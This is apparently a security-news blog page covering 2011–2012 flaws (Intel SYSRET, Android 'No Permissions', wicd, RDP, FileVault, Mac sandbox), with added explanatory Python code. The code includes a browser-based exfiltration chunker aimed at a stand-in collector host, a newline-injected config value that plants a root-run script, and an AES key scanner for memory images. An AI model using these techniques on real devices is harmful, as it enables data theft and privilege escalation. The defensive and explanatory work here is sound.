Showing posts with label OS Vulnerability.

64-bit OS & virtualization software running on Intel CPU vulnerable to local privilege escalation


A critical security vulnerability has been discovered in 64-bit operating systems and virtualization software running on Intel CPUs. It can be used for local privilege escalation or for a guest-to-host virtual machine escape.

The problem affects 64-bit versions of Windows, Linux, FreeBSD and the Xen hypervisor. The flaw appears to affect only Intel hardware; AMD and ARM CPUs are not affected.

"A ring3 attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP)," US-CERT's vulnerability report reads.

"The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP causing a privilege escalation."

Metasploit penetration testing framework founder H.D. Moore characterized the bug as a "serious guest-to-host escape vulnerability," noting that while it affects the Xen platform, it doesn't affect VMware.

Operating-system-specific details on the vulnerability have been published by Xen, FreeBSD and Microsoft. Linux vendor Red Hat has also published two updates on the problem: RHSA-2012:0720-1 and RHSA-2012:0721-1.

To close the security hole, users should apply updates from their operating system supplier.
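The fix the affected kernels adopted for this bug (CVE-2012-0217) is a check on the syscall return path: if the user-mode return address is not canonical, the kernel refuses the fast SYSRET and returns with IRET instead, which raises the same fault before the stack is switched. The Python below is an added illustration of that check; it is not code from any kernel or from the advisory. The 48-bit virtual-address width is an assumption (4-level paging), and the sample addresses are constructed.

```python
"""Canonical-address check behind the SYSRET fix (added example, not kernel code).

On x86-64 with 48-bit virtual addresses (assumed: 4-level paging) an address is
canonical when bits 63..47 are all equal. SYSRET loads RIP from RCX; on Intel
CPUs a non-canonical RCX raises #GP in ring 0 after the user-chosen RSP has
already been loaded, so the kernel must not SYSRET to such an address.
"""

VA_BITS = 48                 # assumed virtual-address width (57 with 5-level paging)
MASK64 = (1 << 64) - 1


def is_canonical(addr: int, va_bits: int = VA_BITS) -> bool:
    """True if the top (64 - va_bits + 1) bits of addr are all 0 or all 1."""
    top = (addr & MASK64) >> (va_bits - 1)
    return top == 0 or top == (1 << (64 - va_bits + 1)) - 1


def pick_return_path(user_rip: int) -> str:
    """Model of a hardened syscall exit: fast SYSRET only for a canonical RIP,
    otherwise the slower IRET, which faults while still on the kernel stack."""
    return "sysret" if is_canonical(user_rip) else "iret"


def classify_frames(rips):
    """Audit helper: for each return address report which exit path it gets."""
    return [(rip, pick_return_path(rip)) for rip in rips]


if __name__ == "__main__":
    # Constructed samples: highest user address, first non-canonical address,
    # lowest kernel address, and the last non-canonical address below it.
    sample = [0x00007FFFFFFFFFFF, 0x0000800000000000,
              0xFFFF800000000000, 0xFFFF7FFFFFFFFFFF]
    for rip, path in classify_frames(sample):
        print(f"RIP {rip:#018x}: {path}")
```

The boundary cases matter: 0x0000800000000000 is the first address above user space and is non-canonical, while 0xFFFF800000000000 is the first canonical kernel address. A check that gets either off by one reintroduces the bug.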

'No permissions' Android app can access sensitive data


Paul Brodeur, a security researcher at Leviathan Security Group, has created a proof-of-concept app called "No Permissions" that demonstrates how an Android application that asks for no permissions at all is still able to access your sensitive data.

Normally, when an Android user installs an app, a screen asks the user to approve the permissions the app requests. The purpose of Android permissions is to tell you exactly what information an app maker will be harvesting from your device, so you can make an informed decision about whether to install it. An app needs permission even for trivial tasks such as network access or keeping the device awake.

According to Brodeur's research, an Android app with zero permissions can still reach sensitive data on the device. His app, which requests no permissions, is able to read files on the SD card, files stored by other apps, and handset identification data.

To send the collected information to an attacker, an app would normally need the INTERNET permission. Unfortunately, there is one way to reach the network that requires no permissions at all.

"The URI ACTION_VIEW Intent opens a browser. By passing data via GET parameters in a URI, the browser will exfiltrate any collected data. In my tests, I found that the app is able to launch the browser even after it has lost focus, allowing for transmission of large amounts of data by creating successive browser calls," the researcher explained.

He tested the app against Android 4.0.3 and Android 2.3.5. If you are curious about the app's capabilities, you can download it from here.
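To make the "successive browser calls" concrete, here is an added Python model of both ends of that channel. It is not the researcher's app (which is Android code): the app side splits the harvested data into URLs short enough for one ACTION_VIEW intent each, and the receiving side reassembles them from ordinary web-server access-log lines. The collector host, the parameter names and the 2,000-character URL budget are assumptions; the payload and the log lines are constructed.

```python
import base64
import re
import urllib.parse

COLLECTOR = "http://collector.example/c"   # hypothetical attacker endpoint
MAX_URL = 2000                             # assumed per-request URL budget
LOG_GET = re.compile(r'"GET (\S+) HTTP/1\.[01]"')

# Constructed stand-in for what the app gathered (IDs plus SD-card bytes).
SAMPLE_PAYLOAD = (b"device_id=000000000000000;files=/sdcard/DCIM/;"
                  + bytes(range(256)) * 20)


def build_exfil_urls(payload: bytes, base: str = COLLECTOR, max_url: int = MAX_URL):
    """App side: encode the payload and split it into URLs of <= max_url chars.
    Each URL would be handed to the browser with one ACTION_VIEW intent."""
    enc = base64.urlsafe_b64encode(payload).decode("ascii").rstrip("=")
    overhead = len("?i=0000&n=0000&d=")          # room for up to 9999 chunks
    room = max_url - len(base) - overhead
    if room <= 0:
        raise ValueError("base URL leaves no room for data")
    chunks = [enc[i:i + room] for i in range(0, len(enc), room)]
    return [f"{base}?i={i}&n={len(chunks)}&d={c}" for i, c in enumerate(chunks)]


def to_access_log(urls, client="10.0.0.5"):
    """Constructed Apache/nginx-style access-log lines for those requests."""
    lines = []
    for u in urls:
        parts = urllib.parse.urlsplit(u)
        lines.append(f'{client} - - [12/Apr/2012:10:00:00 +0000] '
                     f'"GET {parts.path}?{parts.query} HTTP/1.1" 200 0 "-" '
                     f'"Mozilla/5.0 (Linux; Android 4.0.3)"')
    return lines


def reassemble(log_lines):
    """Collector side: stitch the chunks back together from access-log lines.
    Returns None unless every chunk 0..n-1 has been seen."""
    parts, total = {}, None
    for line in log_lines:
        m = LOG_GET.search(line)
        if not m:
            continue
        q = urllib.parse.parse_qs(urllib.parse.urlsplit(m.group(1)).query)
        if not {"i", "n", "d"} <= q.keys():
            continue
        parts[int(q["i"][0])] = q["d"][0]
        total = int(q["n"][0])
    if total is None or any(i not in parts for i in range(total)):
        return None
    enc = "".join(parts[i] for i in range(total))
    return base64.urlsafe_b64decode(enc + "=" * (-len(enc) % 4))


if __name__ == "__main__":
    urls = build_exfil_urls(SAMPLE_PAYLOAD)
    log = to_access_log(urls)
    print(f"{len(SAMPLE_PAYLOAD)} bytes -> {len(urls)} browser launches, "
          f"longest URL {max(map(len, urls))} chars")
    print("round trip ok:", reassemble(log) == SAMPLE_PAYLOAD)
```

On the defending side the same parsing is the detection: a burst of GET requests from one client to one path, each carrying a long, high-entropy query string and a counter, is what this channel looks like in a proxy or web-server log.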

WICD privilege escalation 0day affects Backtrack Linux

A student at the Infosec Institute has found a zero-day vulnerability in the Wireless Interface Connection Daemon (WICD) that affects BackTrack 5.

The discovery was published on InfoSec's own website and detailed by the student himself, who says that WICD has several design flaws that can be abused for privilege escalation.

Improper sanitization of the inputs in the WICD's DBUS interfaces allows an attacker to (semi)arbitrarily write configuration options in WICD's 'wireless-settings.conf' file, including but not limited to defining scripts (executables actually) to execute upon various internal events (for instance upon connecting to a wireless network).

These scripts execute as root, so an attacker with access to the WICD DBUS interface can obtain arbitrary code or command execution as root.

At first, the researchers incorrectly named the vulnerability "Backtrack 5 R2 priv escalation 0day". They later realized the mistake and renamed it "wicd Privilege Escalation 0Day", apologizing to the BackTrack team and anyone else affected by the error for the confusion.


"To summarise, we believe that the intentional misrepresentation of this bug report has discredited BackTrack unnecessarily in the eyes of those who do not understand the underlying mechanisms of our OS, and also discredited the Infosec Institute in the eyes of those who do," the BackTrack team commented on the issue.
The wicd team has released a new version that fixes this bug (CVE-2012-2095).
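The flaw described above is a classic configuration-injection bug: a value that is stored verbatim into an INI-style file can carry a newline, and whatever follows the newline becomes a new key when the file is read back. The following Python is an added illustration of that pattern, not wicd's own code. It models a vulnerable property setter beside a hardened one and includes an audit helper for an existing wireless-settings.conf. The script hook names are given as far as I know them from wicd's configuration and the whitelist of safe keys is illustrative; both are assumptions, and the attacker value is constructed.

```python
import configparser

# Script hooks wicd runs as root around connect/disconnect events (names as I
# know them from wicd's config file; treat as an assumption).
SCRIPT_HOOKS = {"beforescript", "afterscript",
                "predisconnectscript", "postdisconnectscript"}
# Properties an unprivileged caller may legitimately set (illustrative whitelist).
SAFE_KEYS = {"essid", "bssid", "key", "enctype", "automatic",
             "ip", "netmask", "gateway", "dns1", "dns2"}


def serialize(cfg):
    """Write a wireless-settings.conf-style INI text. Values are written
    verbatim, which is exactly what turns an unvalidated value into a new key."""
    out = []
    for section, props in cfg.items():
        out.append(f"[{section}]")
        out.extend(f"{k} = {v}" for k, v in props.items())
        out.append("")
    return "\n".join(out)


def set_property_vulnerable(cfg, section, key, value):
    """Models the flaw: whatever arrives over the bus is stored as-is."""
    cfg.setdefault(section, {})[key] = value


def set_property_hardened(cfg, section, key, value):
    """Validate before storing: no control characters that could start a new
    INI line, no section-delimiter characters, and only whitelisted keys
    (script hooks are never settable from the unprivileged path)."""
    for s in (section, key, value):
        if not isinstance(s, str) or not s.isprintable():
            raise ValueError("control characters are not allowed in config data")
    if any(c in section for c in "[]"):
        raise ValueError("invalid section name")
    if key in SCRIPT_HOOKS or key not in SAFE_KEYS:
        raise ValueError(f"property {key!r} may not be set over this interface")
    cfg.setdefault(section, {})[key] = value


def parse(text):
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def script_hooks_in(text):
    """Audit an existing config: which sections define root-executed scripts?"""
    cp = parse(text)
    return {s: {k: v for k, v in cp[s].items() if k in SCRIPT_HOOKS}
            for s in cp.sections() if set(cp[s]) & SCRIPT_HOOKS}


if __name__ == "__main__":
    bssid = "00:11:22:33:44:55"
    evil = "cafe\nbeforescript = /tmp/evil.sh"   # constructed attacker value
    cfg = {}
    set_property_vulnerable(cfg, bssid, "essid", evil)
    print(serialize(cfg))
    print("hooks found on re-read:", script_hooks_in(serialize(cfg)))
    try:
        set_property_hardened({}, bssid, "essid", evil)
    except ValueError as e:
        print("hardened setter rejected it:", e)
```

Run `script_hooks_in` over a real wireless-settings.conf to see whether any network entry already names a script you did not configure; on an affected host that is the quickest indicator of exploitation.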

Hackers developed Exploit code for RDP vulnerability


Chinese hackers have released proof-of-concept (PoC) code that tries to exploit the recently patched Windows RDP vulnerability. When Microsoft released the patch, it urged customers to update as soon as possible, since it expected an exploit to be developed within the next 30 days. Instead, a PoC appeared in less than three days.

SophosLabs researchers found a Chinese website hosting exploit code written as a Python script. The code attempts to exploit the MS12-020 RDP vulnerability and causes Windows computers to blue screen.

Even though the script only causes a blue screen of death for now, it may not take attackers long to develop it into a full exploit capable of powering a fast-spreading Internet worm. A crash-only PoC is already a denial of service against any server that exposes RDP (TCP port 3389) to untrusted networks, so patching should not wait for a code-execution exploit to appear.

Researchers also came across a fake exploit for the Microsoft RDP vulnerability that claims to be the Python script of a worm. "It references a Python module that doesn't exist (FreeRDP), and claims to be written by sabu@fbi.gov, an obvious reference to the high profile Anonymous hacker who was recently revealed to have been secretly working for the FBI for months," the researcher said.

Hackers offer more than $1,400 for developing a Windows RDP exploit


A website called gun.io, where software developers can hire each other, has an ad that promises to award more than $1,400 (currently $1,451) to the first person who develops a working exploit for the Windows RDP vulnerability.

Because it is listed as an open-source bounty, the reward increases with each passing day. When security journalist Brian Krebs came across the listing, the bounty was $1,435.


Microsoft has already patched this vulnerability and urged users to update. However, many users fail to update, which is why cyber criminals are rushing to get a working exploit released.

"I'd like to see a working exploit for CVE-2012-0002 (the new RDP hole) as a Metasploit module," a user named Rich said.

Krebs said that the current bounty offered for the exploit is almost certainly far less than the price such a weapon could command on the underground market, or even what a legitimate vulnerability research company like TippingPoint might pay for such research.

Forensics Vendor Passware warns Mac OS X FileVault 2 easily decrypted

Passware, Inc., a provider of password recovery tools for law enforcement, has announced that its forensic tools are capable of breaking the disk encryption in Mac OS X.

The original FileVault encrypts the files in a user's home directory with 128-bit AES; FileVault 2, introduced in OS X 10.7 Lion, encrypts the entire startup volume with XTS-AES-128. A master password (or, in 10.7 and later, a recovery key) is created as a precaution against the user losing their password.

Passware claims that Passware Kit Forensic v11.3 can decrypt a FileVault-encrypted Mac disk within 40 minutes, regardless of the length or complexity of the password. Rather than attacking the password, the tool extracts the FileVault encryption key from the target computer's memory, which gives full access to the encrypted disk. The practical limit of this approach is that the key only exists in RAM while the volume is unlocked: the machine must be powered on (or asleep) and the analyst must be able to acquire its memory, so a Mac that has been fully shut down, rather than merely put to sleep, does not expose the key this way.


“Full disk encryption is becoming a major obstacle for digital investigations,” said Dmitry Sumin, president, Passware, Inc. “The latest version of Passware Kit Forensic offers multiple approaches to overcoming this problem, such as live memory analysis and extraction of encryption keys for BitLocker, TrueCrypt, and FileVault. This means forensic experts are better armed to approach investigative challenges with an effective and efficient solution that significantly reduces decryption time and thus allows investigators to focus on data analysis.”

Passware Kit Forensic is available directly from Passware for $995 with one year of free updates. Passware makes the software available primarily to law enforcement.
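The "live memory analysis" in the quote relies on the fact that while an encrypted volume is mounted, its AES key and the round keys derived from it sit in RAM. A well-known way to recover such keys from a memory image is to scan for a valid AES key schedule: every 16-byte window is treated as a candidate key, expanded with the FIPS-197 key schedule, and accepted when the expansion appears directly behind it. The Python below is an added example of that technique in its most basic form; it is not Passware's code and I am not claiming it is their method. The memory image is constructed: random bytes with the FIPS-197 test key's schedule planted at a known offset.

```python
"""Locate AES-128 keys in a memory image by key-schedule matching.

Added example; not Passware's code or method. Each 16-byte window is a
candidate key; it is accepted when its expanded round keys sit right behind it.
"""
import random

RCON = [0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36]


def _build_sbox():
    """Compute the AES S-box from GF(2^8) inverses (no 256-entry table needed)."""
    exp, log = [0] * 256, [0] * 256
    x = 1
    for i in range(255):                 # 3 generates the multiplicative group
        exp[i], log[x] = x, i
        x ^= (x << 1) ^ (0x11B if x & 0x80 else 0)   # x *= 3 in GF(2^8)
    sbox = [0] * 256
    for a in range(256):
        inv = exp[(255 - log[a]) % 255] if a else 0
        s = inv
        for _ in range(4):               # affine part: inv ^ rotl1..rotl4 ^ 0x63
            inv = ((inv << 1) | (inv >> 7)) & 0xFF
            s ^= inv
        sbox[a] = s ^ 0x63
    return sbox


SBOX = _build_sbox()


def _next_round_key(rk: bytes, rcon: int) -> bytes:
    """Derive round key i+1 from round key i (one AES-128 schedule step)."""
    t = rk[12:16]
    t = bytes(SBOX[b] for b in t[1:] + t[:1])        # RotWord + SubWord
    t = bytes([t[0] ^ rcon]) + t[1:]
    out = b""
    for i in range(0, 16, 4):
        t = bytes(a ^ b for a, b in zip(rk[i:i + 4], t))
        out += t
    return out


def expand_key_128(key: bytes) -> bytes:
    """Full 176-byte schedule: the key followed by ten round keys."""
    rks = [bytes(key)]
    for rc in RCON:
        rks.append(_next_round_key(rks[-1], rc))
    return b"".join(rks)


def find_aes128_keys(mem: bytes):
    """Return [(offset, key)] for every 176-byte region that is a valid schedule."""
    hits = []
    for off in range(len(mem) - 175):
        cand = mem[off:off + 16]
        # Cheap filter first: expand fully only when round key 1 already matches.
        if _next_round_key(cand, RCON[0]) != mem[off + 16:off + 32]:
            continue
        if expand_key_128(cand) == mem[off:off + 176]:
            hits.append((off, cand))
    return hits


FIPS_KEY = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # FIPS-197 A.1 test key


def build_sample_dump(size: int = 8192, at: int = 3000, key: bytes = FIPS_KEY) -> bytes:
    """Constructed 'memory image': random bytes with one key schedule planted."""
    rng = random.Random(7)
    buf = bytearray(rng.getrandbits(8) for _ in range(size))
    buf[at:at + 176] = expand_key_128(key)
    return bytes(buf)


if __name__ == "__main__":
    for off, key in find_aes128_keys(build_sample_dump()):
        print(f"AES-128 key schedule at offset {off:#x}: key {key.hex()}")
```

The scan works because a key schedule is highly structured and a random 176-byte region almost never matches one, so false positives are negligible even when stepping byte by byte. It is also why wiping round keys from memory when a volume is unmounted or the machine sleeps is a meaningful hardening step for any disk-encryption implementation.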

Critical Zero-Day Vulnerability found in 64-bit version of Windows 7

A security researcher known as webDEViL (w3bd3vil on Twitter) has discovered a new zero-day vulnerability in the 64-bit version of Windows 7 that allows an attacker to compromise a vulnerable machine; Secunia has published an advisory on it.

The researcher tweeted that the vulnerability can be triggered simply by feeding Safari an IFRAME with an overly large height.


"The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large "height" attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges," the Secunia report says.


Critical Vulnerability found in Apple Mac OS X Sandbox Mechanisms


CoreLabs researchers have discovered a critical vulnerability in Mac OS X's sandboxing mechanisms and published an advisory on November 10, 2011.

Vulnerability Description

Several of the default pre-defined sandbox profiles don't properly limit all the available mechanisms and therefore allow exercising part of the restricted functionality. Namely, sending Apple events is possible within the no-network sandbox (kSBXProfileNoNetwork). A compromised application hypothetically restricted by the use of the no-network profile may have access to network resources through the use of Apple events to invoke the execution of other applications not directly restricted by the sandbox.

It is worth mentioning that a similar issue was reported by Charlie Miller in his talk at Black Hat Japan 2008. He mentioned a few processes sandboxed by default as well as a method to circumvent the protection. Some time after the talk, Apple modified the mentioned profiles by restricting the use of Apple events but did not modify the generic profiles.

According to the advisory, Apple Mac OS X 10.7.x, 10.6.x and 10.5.x are vulnerable; Mac OS X 10.4 is not vulnerable.
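The point of the advisory is that a profile which denies network operations but says nothing about Apple events still lets the sandboxed process ask an unsandboxed one to do its networking for it. Apple's sandbox profiles (SBPL) are s-expressions of (allow|deny operation ...) rules, so the gap can be checked mechanically. The following Python is an added example, not code from Core or Apple: it parses a profile and reports the effective decision for an operation. The two profiles are constructed stand-ins, not Apple's real kSBXProfileNoNetwork text, and the evaluation model (default taken from the last (allow|deny default), then the last rule whose operation pattern matches wins, with filters ignored) is a simplification I am assuming.

```python
import re


def tokenize(text):
    """Split SBPL text into tokens; ';' comments are stripped first."""
    text = re.sub(r";[^\n]*", "", text)
    return re.findall(r'\(|\)|"[^"]*"|[^\s()"]+', text)


def parse(tokens):
    """Minimal s-expression reader returning a list of top-level forms."""
    stack = [[]]
    for t in tokens:
        if t == "(":
            stack.append([])
        elif t == ")":
            form = stack.pop()
            stack[-1].append(form)
        else:
            stack[-1].append(t.strip('"'))
    if len(stack) != 1:
        raise ValueError("unbalanced parentheses")
    return stack[0]


def _matches(pattern, operation):
    """SBPL operation names may end in '*' as a prefix wildcard (network*)."""
    if pattern.endswith("*"):
        return operation.startswith(pattern[:-1])
    return pattern == operation


def effective_decision(profile_text, operation):
    """Assumed model: last (allow|deny default) sets the fallback, the last
    matching operation rule wins, filters (nested lists) are ignored."""
    default = "deny"           # assumed fallback when no default rule is given
    decision = None
    for form in parse(tokenize(profile_text)):
        if not form or form[0] not in ("allow", "deny"):
            continue
        verb = form[0]
        ops = [x for x in form[1:] if isinstance(x, str)]
        if "default" in ops:
            default = verb
        if any(_matches(p, operation) for p in ops if p != "default"):
            decision = verb
    return decision or default


# Constructed profiles (not Apple's real kSBXProfileNoNetwork text).
NO_NETWORK_PROFILE = """
(version 1)
(allow default)
(deny network*)        ; no sockets, but nothing said about Apple events
"""
HARDENED_PROFILE = NO_NETWORK_PROFILE + "(deny appleevent-send)\n"


def escape_report(profile_text, ipc_ops=("appleevent-send",)):
    """If the profile denies the network, list IPC operations still allowed
    that could be used to make another process do the networking."""
    if effective_decision(profile_text, "network-outbound") != "deny":
        return []
    return [op for op in ipc_ops if effective_decision(profile_text, op) == "allow"]


if __name__ == "__main__":
    for name, prof in (("no-network", NO_NETWORK_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(f"{name}: appleevent-send ->",
              effective_decision(prof, "appleevent-send"),
              "| possible escapes:", escape_report(prof))
```

The checker only looks at operation names; a real audit also has to read filters such as (appleevent-destination ...) that narrow a rule, and should treat any IPC the profile leaves open as a potential path around the restrictions it does impose.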